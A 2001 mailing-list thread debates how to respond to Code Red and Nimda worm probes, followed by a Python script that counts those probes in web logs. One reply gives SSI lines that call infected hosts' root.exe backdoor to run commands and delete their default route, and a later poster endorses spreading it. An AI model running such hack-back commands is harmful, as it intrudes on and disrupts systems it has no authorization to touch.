As a non-lawyer, I don't see the problem. The key, to me, is that the
remote (infected) system initiated contact with me. If I went seeking out
vulnerable servers that had no prior contact with me, it would be different.
I'm not sure about the merits of removing their routing table, although I'd
imagine even a few web servers running something like this could
significantly reduce codered's effectiveness in the long run.
Perhaps find an already infected server in some far away land, and install
this little prize on it?
At 10:55 AM 9/24/2001 -0700, [EMAIL PROTECTED] wrote:
>Probably not a good idea. Does anyone remember the recent story about a
>gentleman that now has criminal charges pending against him because
>(trying to be helpful) he notified a company that their frontpage server
>extensions allowed anyone to access their server?
>
>This could really backfire on you...
>
>On Mon, 24 Sep 2001, Paul Chvostek wrote:
>
> >
> > Hi Asgard.
> >
> > I don't think you'll have any luck collecting the $1 per attack. My
> > approach is simpler, though likely to raise eyebrows. Input from
> > lawyers would be especially welcome. ;)
> >
> > My assumptions are:
> > - any host which is attacking me has vulnerabilities which should have
> > been patched months ago, and
> > - any unpatched server is being run by administrators or companies who
> > don't care enough about system uptime to implement proper security.
> >
> > I've created a default.ida file in my web root, and added lines to
> > Apache's httpd.conf to turn .ida files into SSI. My default.ida is:
> >
> > <p>This host is immune to Code Red. Upgrade to a real operating
> > system.</p>
> > <!--#exec cmd="/usr/local/bin/lynx -dump
> > http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+should+fix+it+before+script+kiddie+comes+along+and+take+advantage+of+it+again.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live\),+and+install+a+bloody+virus+scanner.%22"
> > -->
> > <!--#exec cmd="/usr/local/bin/lynx -dump
> > http://$REMOTE_HOST/scripts/root.exe\?/c+route+delete+0.0.0.0" -->
> >
> > If all goes as planned, the effect is to put a message on the console,
> > and remove the default route on the host thereby protecting the Internet
> > and forcing someone to look at the console.
> >
> > Note that this *only* catches machines which have been infected with
> > CodeRed2, which leaves a leftover /scripts/root.exe to play with.
> > If someone wants to tell me how to do this with some of the other
> > vulnerabilities that Nimda tries to use, I'd be grateful. :)
> >
> > p
> >
> >
> > On Sat, Sep 22, 2001 at 10:42:07PM +0200, Asgard Hostmaster wrote:
> > >
> > > Hi,
> > >
> > > Thought I'd post this here as this group seems to be one of the most
> > > eclectic and knowledgeable around. We're all aware of the current NIMDA
> > > worm attacks. I recently modified my IIS 404 error page to do a netblock
> > > lookup on the IP of the server trying to attack ours and then email the
> > > netblock owner and store the information in a database. Since doing that
> > > a little over 24hrs ago we've received 84807 attacks from 101 separate
> > > servers.
> > >
> > > Considering this worm uses exploits that got massive publicity with Code
> > > Red, I'm wondering about liability of companies that continue to run
> > > vulnerable servers? I'm seriously considering automatically reviewing
> > > all ip addresses 24hrs after they've first attacked and if I'm
> > > still being attacked giving them a further 6 or 12 hours and then I'll
> > > charge them $1/attack until it stops. For god's sake it's a 15 min job
> > > at most to actually stop the virus, though longer to fully check and
> > > clear the server. Perhaps this sort of action might convince some people
> > > to finally take server patching seriously? Thoughts folks? Any lawyers
> > > on the list interested in taking it up? :-)
> > >
> > > Cheers,
> > > david
> >
> > --
> > Paul Chvostek <[EMAIL PROTECTED]>
> > Operations / Development / Abuse / Whatever vox: +1 416 598-0000
> > IT Canada http://www.it.ca/
> >
> >
========================================================
Dave Warren,
devilsplayground.net administrator
Email: [EMAIL PROTECTED]
========================================================
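The defender-side counterpart of what Asgard describes (counting worm probes per source host before contacting the netblock owner), as an added example that is not code from anyone in the thread: it classifies web-server log entries by the default.ida and root.exe/cmd.exe request patterns discussed above and tallies them per source IP. The log lines are constructed samples using documentation addresses, and the worm labels are assumptions based on those well-known probe strings.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in Apache combined log format (not taken from the thread).
SAMPLE_LOG = """\
192.0.2.10 - - [24/Sep/2001:10:55:01 -0700] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 273 "-" "-"
198.51.100.7 - - [24/Sep/2001:10:55:02 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273 "-" "-"
198.51.100.7 - - [24/Sep/2001:10:55:02 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 273 "-" "-"
198.51.100.7 - - [24/Sep/2001:10:55:03 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 273 "-" "-"
203.0.113.5 - - [24/Sep/2001:10:56:00 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
192.0.2.10 - - [24/Sep/2001:10:57:30 -0700] "GET /default.ida?NNNNNNNN%u9090 HTTP/1.0" 404 273 "-" "-"
"""

# client IP, request method, request path, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def parse_line(line):
    """(ip, method, path, status) for a combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return (m[1], m[2], m[3], int(m[4])) if m else None

def classify_request(path):
    """Label a request path as a Code Red or Nimda probe, or None if it looks benign."""
    # default.ida is the .ida ISAPI request Code Red / CodeRed2 send; root.exe is the
    # backdoor CodeRed2 leaves and Nimda reuses; cmd.exe via ..%5c traversal is Nimda's.
    p = path.lower()
    if p.startswith("/default.ida"):
        return "CodeRed"
    if "root.exe" in p or "cmd.exe" in p or "%5c.." in p:
        return "Nimda"
    return None

def summarize(log_text):
    """Map each probing source IP to a Counter of worm labels seen from it."""
    by_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, _method, path, _status = rec
        worm = classify_request(path)
        if worm:
            by_ip[ip][worm] += 1
    return by_ip

def attackers(by_ip, min_hits=1):
    """Sorted (ip, total probes) pairs with at least min_hits probes: the list to pass to an abuse-contact lookup."""
    totals = ((ip, sum(c.values())) for ip, c in by_ip.items())
    return sorted((ip, n) for ip, n in totals if n >= min_hits)
```

Feeding a day of real access logs through `summarize` and `attackers` gives the per-host counts Asgard quotes without touching the remote machine.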